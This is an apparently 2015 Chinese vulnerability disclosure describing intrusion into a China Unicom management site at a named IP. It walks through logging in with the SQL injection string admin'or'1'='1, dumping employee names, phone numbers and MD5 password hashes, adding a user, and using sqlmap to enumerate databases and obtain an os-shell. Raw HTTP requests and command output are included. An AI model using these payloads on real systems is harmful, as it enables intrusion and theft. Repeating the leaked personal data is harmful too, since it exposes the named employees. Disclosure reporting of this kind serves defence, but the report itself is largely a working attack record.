2015-06-30: 细节已通知厂商并且等待厂商处理中 2015-07-03: 厂商已经确认,细节仅向厂商公开 2015-07-13: 细节向核心白帽子及相关领域专家公开 2015-07-23: 细节向普通白帽子公开 2015-08-02: 细节向实习白帽子公开 2015-08-17: 细节向公众公开
跟管管侠步伐。。
0x00
http://220.250.65.185/Index.aspx
这个后台可以被爆破。。但其实是admin'or'1'='1口令进入。。先看看有什么功能
0x01然后在这里
点击查询的同时
response会有员工信息。
*****ot;UserID":"songwenjian","UserName":"宋文健","Password":"e6c8ed90d1fcd477fc3c659a78c71811","IsNeedOrderManage":"N","IsNeedReportManage":"Y","IsNeedProductManage":"N","IsNeedCusManage":"N","IsNeedAccountManage":"Y","IsNeedUserManage":"N","IsDel":"N","CreateDt":"\/Date(1423818313000+0800)\/","Telephone":"1"},{"ID":4,"UserID":"baibing","UserName":"白冰","Password":"e6c8ed90d1fcd477fc3c659a78c71811","IsNeedOrderManage":"N","IsNeedReportManage":"Y","IsNeedProductManage":"Y","IsNeedCusManage":"Y","IsNeedAccountManage":"N","IsNeedUserManage":"N","IsDel":"N","CreateDt":"\/Date(1423818186000+0800)\/","Telephone":"18601106560"},{"ID":3,"UserID":"luying","UserName":"卢颖","Password":"0d0589cd78709802a64a9a4580ae6789","IsNeedOrderManage":"Y","IsNeedReportManage":"Y","IsNeedProductManage":"Y","IsNeedCusManage":"Y&*****
*****密码*****
0x02下面是加价钱。我们添加一个用户
ps我已经把加的那个号停用了。0x03登陆出抓包
POST /Login.aspx HTTP/1.1Host: 220.250.65.185Proxy-Connection: keep-aliveContent-Length: 37Accept: application/json, text/javascript, */*; q=0.01Origin: http://220.250.65.185X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://220.250.65.185/Login.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Type=DoLogin&UserID=admin&Password=ad
sqlmap
current database: 'Unicom_FlowManage'available databases [7]:[*] Biz_NFDPriceTest[*] DataServiceCenter[*] master[*] model[*] msdb[*] tempdb[*] Unicom_FlowManage| ??? | 23d1814db536145f94aa605f815b5a57 | 18601106528 || 10 | ?? | 68e91dc1973dc2178a375e3bca88d742 | 13522274096 || 11 | ??? | 68e91dc1973dc2178a375e3bca88d742 | 13501091884 || 2 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601106535 || 3 | ?? | 0d0589cd78709802a64a9a4580ae6789 | 118601107665 || 4 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601106560 || 5 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 1 || 6 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 1 || 7 | ?? | e6c8ed90d1fcd477fc3c659a78c71811 | 15601206983 || 8 | ??? | e6c8ed90d1fcd477fc3c659a78c71811 | 18601001288 || 9 | ??? | 173d92f1ddf25e9829f44341401fa0ee | 18701624225 |+----+----------+----------------------------------+--------------+
sqlmap cmd
command standard output:--- IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 169.254.95.120 IPv4 ?? . . . . . . . . . . . . : 192.168.25.202 ???? IPv6 ??. . . . . . . . : fe80::ad82:e5a9:7a7:672a%23 ????? DNS ?? . . . . . . . : ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? ????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . : 192.168.25.254 ???? . . . . . . . . . . . . : 255.255.255.0Windows IP ??Windows IP ??????? isatap.{286E22C4-AA4F-4482-9B3E-4B728074EF4E}:????? isatap.{41BF5F06-D821-443C-A314-49ABA31C8C65}:????? isatap.{49F8F711-121B-4987-B2C9-8A5C3D2AA8CF}:????? isatap.{8DB27050-BDB0-464D-ACE0-57ACB1404659}:????? Teredo Tunneling Pseudo-Interface:?????? ???? 2:?????? ???? 5:?????? ???? 7:?????? ????:
cmd查出远程端口220.250.65.185:7389<code>加不了用户 <code>command standard output:---========================= ======== ================ =========== ===================================== ======== ================ =========== ============BacsTray.exe 3304 2 8,456 Kcmd.exe 3488 Services 0 5,620 Kconhost.exe 5428 Services 0 5,736 Kconhost.exe 6864 Services 0 6,800 Kconhost.exe 8468 Services 0 5,820 Kcsrss.exe 908 Services 0 9,472 Kcsrss.exe 968 Console 1 8,860 Kcsrss.exe 8592 2 15,492 KDistributedCacheService.e 1524 Services 0 2,250,304 Kdwm.exe 9184 2 7,820 Kexplorer.exe 6664 2 66,828 Kfdhost.exe 5420 Services 0 14,392 Kfdlauncher.exe 5300 Services 0 8,432 KInetMgr.exe 9924 2 56,056 KLogonUI.exe 972 Console 1 19,476 Klsass.exe 380 Services 0 73,120 Klsm.exe 428 Services 0 9,668 Kmmc.exe 6508 2 74,512 Kmsdtc.exe 8056 Services 0 10,536 KMsDtsSrvr.exe 1856 Services 0 42,404 KMtxHotPlugService.exe 9000 2 6,672 KMxUp.exe 6224 2 24,080 Krdpclip.exe 6612 2 12,096 Kservices.exe 432 Services 0 17,036 Ksmss.exe 748 Services 0 2,548 KSMSvcHost.exe 2236 Services 0 31,160 Kspoolsv.exe 1436 Services 0 20,664 Ksppsvc.exe 8816 Services 0 12,976 KSQLAGENT.EXE 11072 Services 0 7,340 Ksqlservr.exe 1520 Services 0 18,540 Ksqlservr.exe 2052 Services 0 667,512 Ksqlwriter.exe 2616 Services 0 10,888 KSsms.exe 6504 2 220,632 Ksvchost.exe 560 Services 0 16,964 Ksvchost.exe 612 Services 0 53,196 Ksvchost.exe 616 Services 0 12,240 Ksvchost.exe 828 Services 0 117,856 Ksvchost.exe 1056 Services 0 21,032 Ksvchost.exe 1112 Services 0 27,728 Ksvchost.exe 1152 Services 0 31,896 Ksvchost.exe 1296 Services 0 18,392 Ksvchost.exe 1816 Services 0 12,872 Ksvchost.exe 2588 Services 0 5,940 Ksvchost.exe 2664 Services 0 18,292 Ksvchost.exe 4668 Services 0 13,276 Ksvchost.exe 5240 Services 0 8,596 Ksvchost.exe 8028 Services 0 7,684 KSystem 4 Services 0 364 KSystem Idle Process 0 Services 0 24 Ktaskeng.exe 6240 2 9,676 Ktaskhost.exe 5824 2 9,484 Ktasklist.exe 11192 Services 0 9,928 KTrustedInstaller.exe 7804 Services 0 174,144 Kw3wp.exe 9148 Services 0 333,176 Kwininit.exe 960 Services 0 7,932 Kwinlogon.exe 1000 Console 1 9,152 Kwinlogon.exe 2496 2 11,812 KWmiPrvSE.exe 5028 Services 0 18,616 Kzabbix_agentd.exe 2700 Services 0 21,912 K???? PID ??? ??# ????---os-shell>
<code>command standard output:---========================= ======== ================ =========== ===================================== ======== ================ =========== ============BacsTray.exe 3304 2 8,456 Kcmd.exe 3488 Services 0 5,620 Kconhost.exe 5428 Services 0 5,736 Kconhost.exe 6864 Services 0 6,800 Kconhost.exe 8468 Services 0 5,820 Kcsrss.exe 908 Services 0 9,472 Kcsrss.exe 968 Console 1 8,860 Kcsrss.exe 8592 2 15,492 KDistributedCacheService.e 1524 Services 0 2,250,304 Kdwm.exe 9184 2 7,820 Kexplorer.exe 6664 2 66,828 Kfdhost.exe 5420 Services 0 14,392 Kfdlauncher.exe 5300 Services 0 8,432 KInetMgr.exe 9924 2 56,056 KLogonUI.exe 972 Console 1 19,476 Klsass.exe 380 Services 0 73,120 Klsm.exe 428 Services 0 9,668 Kmmc.exe 6508 2 74,512 Kmsdtc.exe 8056 Services 0 10,536 KMsDtsSrvr.exe 1856 Services 0 42,404 KMtxHotPlugService.exe 9000 2 6,672 KMxUp.exe 6224 2 24,080 Krdpclip.exe 6612 2 12,096 Kservices.exe 432 Services 0 17,036 Ksmss.exe 748 Services 0 2,548 KSMSvcHost.exe 2236 Services 0 31,160 Kspoolsv.exe 1436 Services 0 20,664 Ksppsvc.exe 8816 Services 0 12,976 KSQLAGENT.EXE 11072 Services 0 7,340 Ksqlservr.exe 1520 Services 0 18,540 Ksqlservr.exe 2052 Services 0 667,512 Ksqlwriter.exe 2616 Services 0 10,888 KSsms.exe 6504 2 220,632 Ksvchost.exe 560 Services 0 16,964 Ksvchost.exe 612 Services 0 53,196 Ksvchost.exe 616 Services 0 12,240 Ksvchost.exe 828 Services 0 117,856 Ksvchost.exe 1056 Services 0 21,032 Ksvchost.exe 1112 Services 0 27,728 Ksvchost.exe 1152 Services 0 31,896 Ksvchost.exe 1296 Services 0 18,392 Ksvchost.exe 1816 Services 0 12,872 Ksvchost.exe 2588 Services 0 5,940 Ksvchost.exe 2664 Services 0 18,292 Ksvchost.exe 4668 Services 0 13,276 Ksvchost.exe 5240 Services 0 8,596 Ksvchost.exe 8028 Services 0 7,684 KSystem 4 Services 0 364 KSystem Idle Process 0 Services 0 24 Ktaskeng.exe 6240 2 9,676 Ktaskhost.exe 5824 2 9,484 Ktasklist.exe 11192 Services 0 9,928 KTrustedInstaller.exe 7804 Services 0 174,144 Kw3wp.exe 9148 Services 0 333,176 Kwininit.exe 960 Services 0 7,932 Kwinlogon.exe 1000 Console 1 9,152 Kwinlogon.exe 2496 2 11,812 KWmiPrvSE.exe 5028 Services 0 18,616 Kzabbix_agentd.exe 2700 Services 0 21,912 K???? PID ??? ??# ????---os-shell>
就到这里结束了。话说cmd下可以下载木马??我没敢尝试。。
危害等级:高
漏洞Rank:12
确认时间:2015-07-03 09:42
CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.
暂无